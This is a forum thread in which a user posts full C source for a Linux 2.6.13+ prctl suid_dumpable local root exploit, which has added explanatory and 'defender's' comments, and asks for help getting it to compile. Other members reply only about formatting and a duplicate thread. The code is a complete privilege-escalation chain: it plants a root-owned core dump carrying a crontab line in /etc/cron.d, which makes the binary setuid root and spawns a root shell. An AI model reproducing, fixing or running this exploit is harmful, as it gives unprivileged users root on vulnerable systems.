
mohammed saud 9Aug2009 13:31

some problems
 
Code:

/* Linux >= 2.6.13 prctl kernel exploit
 *
 * (C) Julien TINNES
 *
 * If you read the Changelog from 2.6.13 you've probably seen:
 *  [PATCH] setuid core dump
 *
 * This patch mainly adds suidsafe to suid_dumpable sysctl but also a new per process,
 * user setable argument to PR_SET_DUMPABLE.
 *
 * This flaw allows us to create a root owned coredump into any directory.
 * This is trivially exploitable.
 *
 */

#include <sys/types.h>
#include <sys/time.h>
#include <sys/resource.h>
#include <sys/prctl.h>
#include <unistd.h>
#include <stdio.h>
#include <errno.h>
#include <signal.h>
#include <stdlib.h>
#include <time.h>

#define CROND "/etc/cron.d"
#define BUFSIZE 2048


/* Core-size limit handed to setrlimit(RLIMIT_CORE) in main(): soft and hard
 * limits both unlimited, so the kernel is permitted to write a core file. */
struct rlimit myrlimit={RLIM_INFINITY, RLIM_INFINITY};

/* printf-style template for the crontab entry that ends up inside the core
 * file.  Arguments, in order (see the snprintf call in main()):
 *   %s  a separator (main() passes "\n"),
 *   %s  path of this executable (chown target),
 *   %s  path of this executable again (chmod 4755 target),
 *   %s  the core file to remove afterwards (CROND "/core"),
 *   %d  this process's pid, which the job signals with USR1.
 * The leading '#' presumably comments out whatever binary data precedes it
 * on the same line of the core file, and "* * * * *" schedules the job every
 * minute.  Defender's note: the artefact this produces is a root-owned file
 * named "core" under /etc/cron.d that is mostly binary but contains a
 * readable chown/chmod 4755 line — that is what file-integrity monitoring of
 * /etc/cron.d would surface. */
char    crontemplate[]=
"#/etc/cron.d/core suid_dumpable exploit\n"
"SHELL=/bin/sh\n"
"PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n"
"#%s* * * * *    root    chown root:root %s && chmod 4755 %s && rm -rf %s && kill -USR1 %d\n";

/* Filled-in crontab text; main() checks the snprintf result against its size. */
char    cronstring[BUFSIZE];
/* Path of this executable, filled by readlink("/proc/self/exe") in main().
 * NOTE(review): readlink() does not NUL-terminate what it writes; the code
 * relies on this static buffer being zero-initialised and on the path being
 * shorter than BUFSIZE.  Left empty if readlink() fails. */
char    fname[BUFSIZE];

/* Scratch timeval, used only to print the estimated wait until the next
 * minute boundary. */
struct timeval te;

/* SIGUSR1 handler installed in main().  Replaces this process image with the
 * executable at fname — which, if the cron line has run, is now root-owned
 * and setuid — so the re-executed program takes main()'s geteuid()==0
 * branch.  The parameter sn (the signal number) is unused.  If execl() fails
 * (e.g. fname is empty because readlink() failed) the call simply returns
 * and main() continues; the failure is not reported. */
void sh(int sn) {
    execl(fname, fname, (char *) NULL);
}
   

/* Entry point.  Run unprivileged, it stages the chain described in the file
 * header: it marks this process dumpable with the "suidsafe" value 2, forks
 * a child that (as this code relies on) inherits that flag, the unlimited
 * core limit, the cwd /etc/cron.d and the memory image holding cronstring,
 * then SEGVs the child so its core file is written into /etc/cron.d.  It
 * then waits for SIGUSR1 (see sh()), which the cron line sends after making
 * this binary root-owned and setuid; re-executed with euid 0, the first
 * branch below spawns a shell.  argc/argv are unused.  Returns 1 on every
 * path that does not exec.
 *
 * Defender's note: the chain rests on an unprivileged process obtaining a
 * root-owned core dump in a directory of its choosing and on cron parsing a
 * stray file there.  The suid_dumpable sysctl named in the header, routing
 * core files elsewhere via kernel.core_pattern, and integrity monitoring of
 * /etc/cron.d are the controls this code depends on being absent.
 * NOTE(review): current kernels are understood to reject value 2 from
 * unprivileged callers — confirm against the running kernel's prctl(2). */
int    main(int argc, char *argv[]) {

    int nw, pid;

    /* Second stage: reached only when the cron job has chown'ed/chmod'ed
     * this binary and sh() re-executed it.  setuid/setgid results are not
     * checked; execl() returns only on failure, so the if-body is the error
     * path (its message says "execle" although execl was called). */
    if (geteuid() == 0) {
        printf("[+] getting root shell\n");
        setuid(0);
        setgid(0);
        if (execl("/bin/sh", "/bin/sh", (char *) NULL)) {
            perror("[-] execle");
            return 1;
        }
    }

    printf("\nprctl() suidsafe exploit\n\n(C) Julien TINNES\n\n");

    /* get our file name */
    /* NOTE(review): readlink() does not NUL-terminate and its length is
     * discarded; correctness relies on fname being zero-filled static
     * storage and the path being shorter than sizeof(fname).  On failure
     * fname stays empty and the later exec in sh() cannot succeed. */
    if (readlink("/proc/self/exe", fname, sizeof(fname)) == -1) {
        perror("[-] readlink");
        printf("This is not fatal, rewrite the exploit\n");
    }

    /* SIGUSR1 is what the cron line sends once it has run (see crontemplate). */
    if (signal(SIGUSR1, sh) == SIG_ERR) {
        perror("[-] signal");
        return 1;
    }
    printf("[+] Installed signal handler\n");

    /* Let us create core files */
    /* setrlimit() result is unchecked; the chdir() determines where the
     * child's core file will be written. */
    setrlimit(RLIMIT_CORE, &myrlimit);
    if (chdir(CROND) == -1) {
        perror("[-] chdir");
        return 1;
    }

    /* exploit the flaw */
    /* Value 2 is the "suidsafe" setting the header describes; the error
     * message below misspells prctl as "prtctl". */
    if (prctl(PR_SET_DUMPABLE, 2) == -1) {
        perror("[-] prtctl");
        printf("Is you kernel version >= 2.6.13 ?\n");
        return 1;
    }

    printf("[+] We are suidsafe dumpable!\n");

    /* Forge the string for our core dump */
    /* nw is int and sizeof() is size_t, so the comparison is done unsigned:
     * a negative (error) return from snprintf also takes the error path,
     * which is the desired outcome even if not obviously intended. */
    nw=snprintf(cronstring, sizeof(cronstring), crontemplate, "\n", fname, fname, CROND"/core", getpid());
    if (nw >= sizeof(cronstring)) {
        printf("[-] cronstring is too small\n");
        return 1;
    }
    printf("[+] Malicious string forged\n");

    if ((pid=fork()) == -1) {
        perror("[-] fork");
        return 1;
    }

    if (pid == 0) {
        /* This is not the good way to do it ;) */
        /* Child: idle until the parent signals it (or exit after 120 s). */
        sleep(120);
        exit(0);
    }

    /* SEGFAULT the child */
    /* 11 is SIGSEGV on common Linux targets; the SIGSEGV macro would be
     * clearer.  The child's core is what carries cronstring into CROND. */
    printf("[+] Segfaulting child\n");
    if (kill(pid, 11) == -1) {
        perror("[-] kill");
        return 1;
    }
    /* 60 - (tv_sec % 60) is the number of seconds until the next minute
     * boundary, i.e. roughly when a once-a-minute cron job would next fire. */
    if (gettimeofday(&te, NULL) == 0)
        printf("[+] Waiting for exploit to succeed (~%ld seconds)\n", 60 - (te.tv_sec%60));
    /* sleep() returns early if SIGUSR1 arrives; sh() then execs fname and
     * this code is never reached unless that exec fails. */
    sleep(120);

    printf("[-] It looks like the exploit failed\n");

    return 1;
}

I compiled it on Linux from the terminal and it gave me an error message about a code problem on this line:
struct rlimit myrlimit={RLIM_INFINITY, RLIM_INFINITY};

Please, please help me.

xpi0t0s 9Aug2009 15:28

Re: some problems
 
Please:
(a) Use code blocks when posting code
(b) DO NOT post duplicate threads http://www.go4expert.com/showthread.php?t=18939
(c) be more clear about precisely what help you need and provide all relevant details (which may in this case include some error messages, but to be honest I really can't decode "I wrot by linux in the terminl it's take for me message some cood problems" so it's difficult to guess what details may be relevant.)

shabbir 9Aug2009 16:58

Re: some problems
 
I deleted other thread.

